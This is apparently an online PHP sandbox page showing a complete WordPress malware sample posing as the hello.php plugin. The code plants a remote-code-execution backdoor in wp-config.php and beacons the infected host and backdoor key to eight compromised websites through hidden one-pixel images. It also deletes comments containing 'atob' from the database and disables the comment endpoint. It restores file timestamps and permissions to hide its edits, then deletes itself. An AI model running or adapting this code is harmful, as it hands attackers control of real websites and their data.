- Output for 4.3.0 - 4.3.11, 4.4.0 - 4.4.9, 5.0.0 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.45, 5.5.24 - 5.5.35, 5.6.8 - 5.6.28, 7.0.0 - 7.0.20, 7.1.0 - 7.1.20, 7.2.0 - 7.2.33, 7.3.16 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.34, 8.2.0 - 8.2.30, 8.3.0 - 8.3.31, 8.4.1 - 8.4.22, 8.5.0 - 8.5.7
- <?php function Uno_encode($String) { $Salt='dc5p9dOpBc'; $StrLen = strlen($String); $Seq = 'DMEf5HZuPq'; $Gamma = ''; while (strlen($Gamma)<$StrLen) { $Seq = pack("H*",sha1($Gamma.$Seq.$Salt)); $Gamma.=substr($Seq,0,8); } return base64_encode($String^$Gamma); } function report($rcd){ $recivers[] = 'http://lighthouse-church.co.uk/wp-content/languages/it/it.php'; $recivers[] = 'http://www.bureautaalvast.nl/wp-content/gallery/header/u/pic.php'; $recivers[] = 'http://westburyinteriors.co.uk/wp-content/uploads/2014/11/img.php'; $recivers[] = 'http://bristrand.se/hemsida/tmp/img.php'; $recivers[] = 'http://thicknessplaner.org/wp-content/plugins/akismet/u/pis.php'; $recivers[] = 'http://tfpack24.info/wp-content/plugins/ask/index.php'; $recivers[] = 'http://planelocations.com/extendstats/u/in.php'; $recivers[] = 'http://accionenredcanarias.com/inc/t/index.php'; $z = str_replace('wp-content/plugins/hello.php','',$_SERVER["REQUEST_URI"]); $report = Uno_encode($_SERVER["HTTP_HOST"]. $z . '|' . $rcd); shuffle($recivers); foreach($recivers as $t){ echo '<img width=1 height=1 src="' .$t . '?data=' .$report.'">'; } } function remove_comment(){ include_once('../../wp-config.php'); $con = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD); mysql_select_db(DB_NAME, $con); $zapros = 'delete from ' . $table_prefix . 'comments where comment_content like \'%atob%\';'; $r = mysql_query($zapros); mysql_close($con); } function patch_wp(){ $fname = '../../wp-comments-post.php'; if(file_exists($fname)){ $t = '<?php die(); ?>' . PHP_EOL; $time = filemtime($fname); $writ = false; if (!is_writable($fname)){ $perm = substr(sprintf('%o', fileperms($fname)), -4); @chmod($fname,0666); $writ = true; } clearstatcache(); if (is_writable($fname)){ $tmp = @file_get_contents($fname); $tmp = $t . $tmp; } if (strlen($tmp) > 10){ $f = fopen($fname,"w"); fputs($f,$tmp); fclose($f); } clearstatcache(); if ($writ){ for($i=strlen($perm)-1;$i>=0;--$i){ $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1)); } @chmod($fname,$perms); } @touch($fname,$time); } } function self_remove(){ $fname = __FILE__; $time = filemtime($fname); $writ = false; if (!is_writable($fname)){ $perm = substr(sprintf('%o', fileperms($fname)), -4); @chmod($fname,0666); $writ = true; } clearstatcache(); if (is_writable($fname)){ $tmp = @file_get_contents($fname); $pos = strpos($tmp,'49de371511c1de3b'.'de34b0108ec7f129'); $tmp = substr($tmp,$pos + 32); if (strlen($tmp) > 10){ $f = fopen($fname,"w"); fputs($f,$tmp); fclose($f); } clearstatcache(); if ($writ){ for($i=strlen($perm)-1;$i>=0;--$i){ $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1)); } @chmod($fname,$perms); } @touch($fname,$time); } } $fname = '../../wp-config.php'; if(file_exists($fname)){ $rcd = md5($_SERVER["HTTP_HOST"].$_SERVER["HTTP_USER_AGENT"].rand(0,10000)); $t = 'if (isset($_REQUEST[\'FILE\'])){$_FILE = $_REQUEST[\''.$rcd.'\'](\'$_\',$_REQUEST[\'FILE\'].\'($_);\'); $_FILE(stripslashes($_REQUEST[\'HOST\']));}'; $time = filemtime($fname); $size = filesize($fname); $writ = false; if (!is_writable($fname)){ $perm = substr(sprintf('%o', fileperms($fname)), -4); @chmod($fname,0666); $writ = true; } clearstatcache(); if (is_writable($fname)){ $tmp = @file_get_contents($fname); $tmp = str_replace('$table_prefix', $t . PHP_EOL . '$table_prefix', $tmp); if (strlen($tmp) > 10){ $f = fopen($fname,"w"); fputs($f,$tmp); fclose($f); } clearstatcache(); if ($writ){ for($i=strlen($perm)-1;$i>=0;--$i){ $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1)); } @chmod($fname,$perms); } @touch($fname,$time); } clearstatcache(); if($size !== filesize($fname)){ report($rcd); } } remove_comment(); patch_wp(); self_remove(); ?> //49de371511c1de3bde34b0108ec7f129